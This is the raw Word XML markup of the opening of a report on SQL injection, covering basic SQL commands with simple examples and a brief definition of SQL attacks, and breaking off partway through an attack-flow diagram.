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4BD5D197">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>In-Depth Research Report on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B49D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A14FF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AED98E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="42D89703">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5193665" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="sq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qli"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5193665" cy="2705100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECBC961">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A3109A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F78AF7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6817D3A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4CFA55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0D4F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction to SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D45E706">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB3526E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="4117340"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="2" name="Picture 2" descr="sq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qli"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="4117340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E053525">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B59EEBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL (Structured Query Language) is a standardized programming language used for managing and manipulating relational databases. It is used to perform various operations, such as querying data, updating records, and managing database structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD01E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA9E88C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE34C11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1646B918">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A simple SQL query to retrieve all records from a `users` table would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5956F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049294A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6630CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT * FROM users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4803A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699C822">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD3DECE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Important SQL Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457BE70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D87744">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. SELECT: Retrieves data from one or more tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A8071">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF12CC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Example: `SELECT name FROM users WHERE id = 1;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44374C9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B2E780">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. INSERT: Adds new data to a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D5FF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4E755">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Example: `INSERT INTO users (name, email) VALUES ('Alice', 'alice@example.com');`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A84AD4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656F53F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. UPDATE: Modifies existing data in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B3723">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436E640A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Example: `UPDATE users SET email = 'alice_new@example.com' WHERE name = 'Alice';`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BCE045">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFFD27F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. DELETE: Removes data from a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164798CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503F72A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Example: `DELETE FROM users WHERE id = 1;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE750AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7779E662">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. CREATE TABLE: Defines a new table and its structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692D972">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22244FD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724DA19F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331ABB9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   CREATE TABLE users (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389328B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B5486">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDCFF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       email VARCHAR(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E327B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A523E24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE249E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20454AB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>What are SQL Attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFEED46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4FA985">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL attacks involve the exploitation of vulnerabilities in an application’s software to manipulate SQL queries executed by the database. These attacks can lead to unauthorized access, data breaches, and other malicious outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946A25E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EE7A9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Diagram of SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C0907">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5715E727">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC7E9EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710FD2D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|  User Input      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D797D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>| (Untrusted Data) |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F784202">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+--------+---------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492DF40E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">         |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077D56B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">         v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53047F1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4AD485">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|  Application      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E29B850">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>| (SQL Query Logic) |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B47091">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+--------+---------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB72A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">         |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B55718">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
